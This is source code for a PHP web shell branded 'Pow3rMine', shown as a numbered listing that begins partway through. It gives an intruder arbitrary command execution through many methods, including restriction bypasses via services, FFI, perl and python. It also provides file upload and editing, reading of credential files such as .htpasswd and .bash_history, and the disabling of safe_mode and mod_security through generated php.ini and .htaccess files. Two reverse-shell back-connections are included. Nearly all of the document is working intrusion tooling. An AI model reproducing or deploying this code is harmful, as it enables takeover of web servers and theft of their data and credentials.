  776. function RegisterGlobals() {
  777. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  778. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  779. }
  780. function GetRealIP() {
  781. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  782. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  783. else {$ip=getenv(REMOTE_ADDR);}
  784. return $ip;
  785. }
  786. function SelectCommand($os) {
  787. global $os;
  788. if($os == 'Windows') {
  789. echo "
  790. <select name='alias' id='alias' onChange='AddAlias();' >
  791. <option value=''>NONE</option>
  792. <option value='dir' >List Directory</option>
  793. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  794. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  795. <option value='netstat -an'>Show active connections</option>
  796. <option value='net start'>Show running services</option>
  797. <option value='tasklist'>Show Pro</option>
  798. <option value='net user'>User accounts</option>
  799. <option value='net view'>Show computers</option>
  800. <option value='arp -a'>ARP Table</option>
  801. <option value='ipconfig /all'>IP Configuration</option>
  802. <option value='netstat -an'>netstat -an</option>
  803. <option value='systeminfo'>System Informations</option>
  804. <option value='getmac'>Get Mac Address</option>
  805. </select>
  806. ";
  807. }
  808. else {
  809. echo "
  810. <select name='alias' id='alias' onChange='AddAlias();' >
  811. <option value=''>NONE</option>
  812. <option value='ls -la'>List dir</option>
  813. <option value='cat /etc/hosts'>IP Addresses</option>
  814. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  815. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  816. <option value='netstat -an | grep -i listen'>show opened ports</option>
  817. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  818. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  819. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  820. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  821. <option value='find / -type f -name'>find files</option>
  822. <option value='find / -type f -name \"config*\"'>find config* files</option>
  823. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  824. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  825. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  826. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  827. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  828. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  829. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  830. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  831. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  832. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  833. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  834. <option value='locate httpd.conf'>locate httpd.conf files</option>
  835. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  836. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  837. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  838. <option value='locate my.conf'>locate my.conf files</option>
  839. <option value='locate admin.php'>locate admin.php files</option>
  840. <option value='locate cfg.php'>locate cfg.php files</option>
  841. <option value='locate conf.php'>locate conf.php files</option>
  842. <option value='locate config.dat'>locate config.dat files</option>
  843. <option value='locate config.php'>locate config.php files</option>
  844. <option value='locate'>locate files</option>
  845. <option value='locate'>locate</option>
  846. <option value='locate config.default.php'>locate config.default.php files</option>
  847. <option value='locate config'>locate config* files </option>
  848. <option value='locate \".conf\"'>locate .conf files</option>
  849. <option value='locate \".pwd\"'>locate .pwd files</option>
  850. <option value='locate \".sql\"'>locate .sql files</option>
  851. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  852. <option value='locate \".bash_history\"'>locate .bash_history files</option>
  853. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  854. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  855. <option value='locate backup'>locate backup files</option>
  856. <option value='locate dump'>locate dump files</option>
  857. <option value='locate priv'>locate priv files</option>
  858. </select>
  859. ";
  860. }
  861. }
  862. function CSS($sh3llColor) {
  863. $css = "
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  958. function openPHPInfo(){my_window= (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
  959. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  960. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
  961. function change_dir_mode() {
  962. var dir_mode = document.getElementById('dir_mode').value;
  963. document.location = '?dir_mode='+dir_mode;
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  969. function filter($string) {
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  973. function footer() {
  974. echo '
  975. <table width="100%">
  976. <tr>
  977. <td width="100%"><center>
  978. <sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>
  980. <sy> ? </sy>Skype: Pow3rMine | Email:<sy> ?</sy></b>
  981. </center></td>
  982. </tr>
  983. </table>
  984. </body></html>
  985. ';
  986. }
  987. function print_exe_method() {
  988. global $os; global $exec_method;
  989. if($os == "Linux") {
  990. ?>
  991. <select name="exe_method" >
  992. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  993. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  994. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  995. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  996. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  997. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  998. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  999. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1000. </select>
  1001. <?php
  1002. } else {
  1003. ?>
  1004. <select name="exe_method" >
  1005. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1006. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1007. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1008. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1009. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1010. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1011. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1012. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1013. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1014. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1015. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1016. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1017. </select>
  1018. <?php
  1019. }
  1020. }
  1021. function Exe($command) {
  1022. global $dir;global $os;global $exec_method;
  1023. $command = filter($command);
  1025. if($exec_method == "exec") {
  1026. exec($command,$output);echo join("\n",$output);
  1027. } else if($exec_method == "system") {
  1028. system($command);
  1029. } else if($exec_method == "shell_exec") {
  1030. echo shell_exec($command);
  1031. } else if($exec_method == "passthru") {
  1032. passthru($command);
  1033. } else if($exec_method == "proc_open") {
  1034. echo proc_exec($command,$dir);
  1035. } else if($exec_method == "popen") {
  1036. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1037. } else if($exec_method == "win_shell_execute") {
  1038. echo winshell($command);
  1039. } else if($exec_method == "win32_create_service") {
  1040. echo srvshell($command);
  1041. } else if($exec_method == "ffi") {
  1042. echo ffishell($command);
  1043. } else if($exec_method == "perl") {
  1044. echo perlshell($command);
  1045. } else if($exec_method == "python") {
  1046. echo python_eval("import os\nos.system('".$command."')");
  1047. } else if($exec_method == "slash_bypass") {
  1048. echo slashBypass($command);
  1049. }
  1050. }
  1051. function proc_exec($com , $dir) {
  1052. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1053. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1054. return stream_get_contents($pipes[1]);
  1055. }
  1056. function winshell($command) {
  1057. $name=whereistmP()."\\".uniqid('NJ');
  1058. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1059. sleep(1);
  1060. $exec=file_get_contents($name);
  1061. DeleteFile($name);
  1062. return $exec;
  1063. }
  1064. function srvshell($command) {
  1065. $name=whereistmP()."\\".uniqid('NJ');
  1066. $n=uniqid('NJ');
  1067. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1068. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1069. win32_start_service($n);
  1070. win32_stop_service($n);
  1071. win32_delete_service($n);
  1072. while(!file_exists($name))sleep(1);
  1073. $exec=file_get_contents($name);
  1074. DeleteFile($name);
  1075. return $exec;
  1076. }
  1077. function ffishell($command) {
  1078. $name=whereistmP()."\\".uniqid('NJ');
  1079. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1080. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1081. while(!file_exists($name))sleep(1);
  1082. $exec=file_get_contents($name);
  1083. DeleteFile($name);
  1084. return $exec;
  1085. }
  1086. function perlshell($command) {
  1087. $perl=new perl();
  1088. ob_start();
  1089. $perl->eval("system('".$command."')");
  1090. $exec=ob_get_contents();
  1091. ob_end_clean();
  1092. return $exec;
  1093. }
  1094. function slashBypass($cmd) {
  1095. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1096. exec("\start cmd.bat");
  1097. $content = file_get_contents('sy3.txt');
  1098. unlink('sy3.txt');
  1099. return $content;
  1100. }
  1101. function GenerateFile($name,$content) {
  1102. if(function_exists('fopen') && function_exists('fclose')) {
  1103. $file = fopen($name,"w+");
  1104. if($file) {
  1105. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
  1106. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1107. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1108. if(!$writeFile){return false;}
  1109. }
  1110. else{return false;}fclose($file);return true;
  1111. }
  1112. }
  1113. function ScanDirs() {
  1114. global $os; global $dir;global $safeMode;global $dir_mode;
  1115. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1116. else {
  1117. $result .= "Perms Size Time Owner/Group R/W Type File
  1118. -----------------------------------------------------------------------------
  1119. ";
  1120. $handel = opendir($dir);
  1121. while(($file = readdir($handel))!= false)
  1122. {
  1123. $size = filesize($file);
  1124. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1125. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1126. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1127. $perms = fileperms($file);
  1128. $time = date("y/m/d", filectime($file));
  1129. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1130. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1131. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
  1132. ";
  1133. }
  1134. }
  1135. return $result;
  1136. }
  1137. echo footer();
  1138. ?>
  1139. <?php
  1141. $user = 'powermine';
  1142. $pass = 'spycorder';
  1143. $uselogin = 1;
  1144. $sh3llColor = "green";
  1146. # MySQL Info ---------
  1147. $DBhost = "localhost";
  1148. $DBuser = "root";
  1149. $DBpass = "root";
  1150. #---------------------
  1151. session_start();
  1152. error_reporting(0);
  1153. set_magic_quotes_runtime(0);
  1154. set_time_limit(0);
  1155. ignore_user_abort(TRUE);
  1156. ini_restore("safe_mode");
  1157. ini_restore("open_basedir");
  1158. ini_set('max_execution_time',0);
  1159. ini_set('output_buffering',0);
  1160. ini_set('safe_mode','Off');
  1162. // Set Current Directory
  1163. if(!$_POST && !$_SESSION['curDir']) {
  1164. $dir = getcwd();
  1165. $_SESSION['curDir'] = $dir;
  1166. } else if(empty($_POST['curDir'])) {
  1167. $dir = $_SESSION['curDir'];
  1168. } else {
  1169. $dir = filter($_POST['curDir']);
  1170. $_SESSION['curDir'] = $dir;
  1171. }
  1172. // Set Dir Mode
  1173. if($_GET['dir_mode']) {
  1174. $dir_mode = $_GET['dir_mode'];
  1175. $_SESSION['dir_mode'] = $dir_mode;
  1176. } else {
  1177. $dir_mode = $_SESSION['dir_mode'];
  1178. }
  1180. // Set Usable Command
  1181. if($_POST['exe_method']) {
  1182. $exec_method = $_POST['exe_method'];
  1183. } else {
  1184. $exec_method = "exec";
  1185. }
  1186. # Logout
  1187. if($_POST['logout']) {
  1188. print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  1189. print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  1190. }
  1191. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
  1192. if($_GET['info']){phpinfo();}
  1193. $safeMode = SafeMode();
  1194. $server = substr($SERVER_SOFTWARE,0,120);
  1195. $daemon = "";
  1196. ?>
  1197. <html>
  1198. <head>
  1199. <title>Pow3rMine</title>
  1200. <link rel="shortcut icon" href='' />
  1201. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  1202. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  1203. <?php echo CSS($sh3llColor); ?>
  1205. </head>
  1206. <body dir='ltr'>
  1207. <?php
  1208. # ---------------------------------------#
  1209. # Authentication #
  1210. #----------------------------------------#
  1211. if ($uselogin ==1) {
  1212. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
  1213. if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  1214. if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
  1215. print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  1216. } else {
  1217. if($_POST['usrname']){
  1218. print'<script>alert("Nike ta mère ffddddpppp");</script>';
  1219. }
  1220. ?>
  1221. <br><br>
  1222. <center><img src=""><br />
  1223. <sy>Pow3rMine</sy>
  1224. </center><br />
  1225. <div align="center">
  1226. <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  1227. <input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  1228. <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  1229. <input type="submit" value=" Login " name="login" />
  1230. </form>
  1231. </div>
  1232. <?php
  1233. footer();
  1234. exit;
  1235. }
  1236. }
  1237. }
  1238. ?>
  1239. <table cellpadding='0' cellspacing='0' width='100%'>
  1240. <tr>
  1241. <td width='160'>
  1242. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  1243. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='' width='100%' height='100%'></a><br>
  1244. <center>PowerMine™
  1245. <p></p>
  1246. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  1247. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  1248. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  1249. </select>
  1250. </center>
  1251. </td>
  1252. <td>
  1253. <form method="post">
  1254. <table width='100%' style="border:none; padding:2px;" >
  1255. <tr>
  1256. <td width='103'>System</td>
  1257. <td width="323"><?php echo $os; ?></td>
  1258. <td width="90">Apache Modules</td>
  1259. <td width="278"><select ><?php
  1260. if(function_exists("apache_get_modules")) {
  1261. foreach (apache_get_modules() as $module) {
  1262. echo "<option>".$module."</option>";
  1263. }
  1264. }else {
  1265. echo "<option>NONE</option>";
  1266. }
  1267. ?></select></td>
  1268. </tr>
  1269. <tr>
  1270. <td>uname </td>
  1271. <td><a href='<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  1272. <td>Curl</td>
  1273. <td><?php echo Curl(); ?></td>
  1274. </tr>
  1275. <tr>
  1276. <td>pwd</td>
  1277. <td><?php echo getcwd(); ?></td>
  1278. <td>Open Basedir</td>
  1279. <td><?php echo openBaseDir(); ?></td>
  1280. </tr>
  1281. <tr>
  1282. <td>whoami</td>
  1283. <td><?php echo get_current_user(); ?></td>
  1284. <td>Magic_Quotes</td>
  1285. <td><?php echo magicQouts(); ?></td>
  1286. </tr>
  1287. <tr>
  1288. <td>Server</td>
  1289. <td><?php echo $server; ?></td>
  1290. <td>Register Globals</td>
  1291. <td><?php echo RegisterGlobals(); ?></td>
  1292. </tr>
  1293. <tr>
  1294. <td>Server Name</td>
  1295. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  1296. <td>Gzip</td>
  1297. <td><?php echo Gzip(); ?></td>
  1298. </tr>
  1299. <tr>
  1300. <td>Your IP</td>
  1301. <td><?php echo GetRealIP(); ?></td>
  1302. <td>Oracle</td>
  1303. <td><?php echo Oracle(); ?></td>
  1304. </tr>
  1305. <tr>
  1306. <td>Server IP</td>
  1307. <td><a href='<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  1308. <td>MSQL</td>
  1309. <td><?php echo MSQL(); ?></td>
  1310. </tr>
  1311. <tr>
  1312. <td>PHP Version</td>
  1313. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  1314. <td>MySQL</td>
  1315. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  1316. </tr>
  1317. <tr>
  1318. <td>Safe Mode</td>
  1319. <td><?php echo $safeMode; ?></td>
  1320. <td>MySQLi</td>
  1321. <td><?php echo MysqlI(); ?></td>
  1322. </tr>
  1323. <tr>
  1324. <td>disable functions</td>
  1325. <td><select name="disableFunctions"><?php
  1326. $funArray = DisableFunctions();
  1327. $funArray = explode(",",$funArray);
  1328. sort($funArray);
  1329. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  1330. ?></select>
  1331. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  1332. </td>
  1333. <td>MsSQL</td>
  1334. <td><?php echo MsSQL(); ?></td>
  1335. </tr>
  1336. </table>
  1337. &nbsp; [<a href='' target='_blank'>MD5 Cracker</a>]
  1338. [<a href='' target='_blank'>SHA1 Cracker</a>]
  1339. [<a href='' target='_blank'>NTLM Cracker</a>]
  1341. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  1342. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  1343. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  1344. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  1345. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  1346. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  1347. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  1348. <br>
  1349. </form>
  1350. </table>
  1352. <form method="post">
  1353. <center>
  1354. <textarea cols="150" rows="20" name="result" >
  1355. <?php
  1356. chdir($dir);
  1357. if($_POST['login'] || !$_POST){echo ScanDirs();}
  1358. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
  1359. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
  1360. else if($_POST['UPLOAD_Execute']) {
  1361. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  1362. if($_FILES['uploadfile']['name'][$i] != '') {
  1363. if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  1364. else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  1365. if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  1366. "; }
  1367. else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
  1368. ";}
  1369. }
  1370. }
  1371. }
  1372. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  1373. else if($_POST['SAVE_Execute']) {
  1374. $content = filter($_POST['result']);
  1375. if(empty($content)){$content = " ";}
  1376. if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  1377. }
  1378. else if($_POST['READ_Execute']) {
  1379. $path = urldecode(filter($_POST['READ_Line']));
  1380. $file = fopen($path,'r+');
  1381. if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
  1382. else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  1383. else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  1384. else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  1385. else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  1386. else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  1387. else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  1388. else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  1389. else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  1390. else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  1391. else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  1392. else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  1393. else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  1394. else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  1395. else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  1396. else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  1397. else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  1398. else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  1399. else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  1400. else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  1401. }
  1402. else if($_POST['STOP_Execute']) {
  1403. $genTry = GenerateFile("php.ini","
  1404. safe_mode = Off
  1405. disable_functions = NONE
  1406. safe_mode_gid = OFF
  1407. open_basedir = OFF");
  1408. if($genTry){echo "[+] php.ini Has Been Generated Successfully
  1409. ";}
  1410. else {echo "[-] Failed to generate php.ini file !!
  1411. ";}
  1413. $genTry = GenerateFile(".htaccess","
  1414. <IfModule mod_security.c>
  1415. SecFilterEngine Off
  1416. SecFilterScanPOST Off
  1417. SecFilterCheckURLEncoding Off
  1418. SecFilterCheckCookieFormat Off
  1419. SecFilterCheckUnicodeEncoding Off
  1420. SecFilterNormalizeCookies Off
  1421. </IfModule>
  1422. <Limit GET POST>
  1423. order deny,allow
  1424. deny from all
  1425. allow from all
  1426. </Limit>
  1427. <Limit PUT DELETE>
  1428. order deny,allow
  1429. deny from all
  1430. </Limit>
  1431. SetEnv PHPRC ".getcwd()."/php.ini
  1432. ");
  1433. if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  1434. ";}
  1435. else {echo "[-] Failed to generate .htaccess file !!
  1436. ";}
  1437. }
  1438. else if($_POST['CON_Type'] == "socks") {
  1439. $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1440. if($sock < 0){echo "[-] failed to create socket.";}
  1441. else {
  1442. $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  1443. if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  1444. else {
  1445. $send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
  1446. socket_write($sock, $send_var, strlen($send_var));
  1447. while($input = socket_read($sock, 10000)) {
  1448. socket_write($sock, shell_exec($input), 12000);
  1449. }
  1450. }
  1451. }
  1452. } else if($_POST['CON_Type'] == "fsockopen") {
  1453. $ip = filter(trim($_POST['ip']));
  1454. $port = filter(trim($_POST['port']));
  1455. if (!empty($ip)) {
  1456. $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  1457. if (!$con_fsockopen){
  1458. $result = "Error: didnt connect !!!";
  1459. } else {
  1460. $newLine="\n";
  1461. fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  1462. fputs($con_fsockopen , system("uname -a") .$newLine );
  1463. fputs($con_fsockopen , system("pwd") .$newLine );
  1464. fputs($con_fsockopen , system("id") .$newLine.$newLine );
  1465. while(!feof($con_fsockopen)){
  1466. fputs ($con_fsockopen);
  1467. $one="[$";
  1468. $two="]";
  1469. $result= fgets ($con_fsockopen, 8192);
  1470. $message = $result;
  1471. fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  1472. }
  1473. fclose ($con_fsockopen);
  1474. }
  1475. }
  1476. }
  1477. else if($_POST['USERS_1']){echo GetUsers1();}
  1478. else if($_POST['USERS_2']) {
  1479. $array = GetUsers2();
  1480. foreach($array as $line)
  1481. {echo $line."
  1482. ";}
  1483. }
  1484. else if($_POST['USERS_3']) {
  1485. $array = GetUsers3();
  1486. foreach($array as $line)
  1487. {echo $line."
  1488. ";}
  1489. }
  1490. else if($_POST['USERS_4']) {
  1491. $array = GetUsers4();
  1492. foreach($array as $line)
  1493. {echo $line."
  1494. ";}
  1495. } else if($_POST['USERS_5']){echo GetUsers5();}
  1496. else if($_POST['forbidden_bypass']) {
  1497. mkdir("forbidden");
  1498. chdir("forbidden");
  1499. $forbidden_htaccess = GenerateFile(".htaccess", "
  1500. DirectoryIndex sea.txt
  1501. HeaderName sea.txt
  1502. ReadmeName sea.txt
  1503. footerName sea.txt
  1504. ErrorDocument 404 /404.html
  1505. 404.html = Symlinked sea.txt
  1506. Options all
  1507. ForceType text/plain
  1508. AddType text/plain .php
  1509. AddType text/plain .html
  1510. AddHandler server-parsed .php
  1511. AddHandler txt .php
  1512. ");
  1513. if($forbidden_htaccess) {
  1514. echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  1515. } else {
  1516. echo "[-] error with generating .htaccess file.";
  1517. }
  1518. } else if($_POST['find_755']) {
  1519. Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  1520. }
  1521. ?></textarea>
  1522. <?php
  1523. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  1524. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  1525. ";}
  1526. ?>
  1527. </center></form>
  1528. <table width='100%'>
  1529. <tr valign="top">
  1530. <td width='30%'>
  1531. <!-- Command Line -->
  1532. <form method='POST' enctype="multipart/form-data">
  1533. <table height='72' border='0' id='Box' width="100%">
  1534. <tr>
  1535. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1536. <td style="background-color:#666;padding-left:10px;">Edit File
  1537. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  1538. </tr>
  1539. <tr>
  1540. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  1541. </tr>
  1542. </table>
  1543. </form>
  1544. <!-- End Of Command Line-->
  1546. </td>
  1547. <td width='30%' height='30'>
  1548. <!-- Command Line -->
  1549. <form method='POST' enctype="multipart/form-data">
  1550. <table height='72' border='0' id='Box'>
  1551. <tr>
  1552. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1553. <td style="background-color:#666;padding-left:10px;">Command Line
  1554. <?php echo print_exe_method(); ?>
  1555. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  1556. </td>
  1557. </tr>
  1558. <tr>
  1559. <td height="45" colspan="2">
  1560. <?php echo SelectCommand($os); ?>
  1561. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
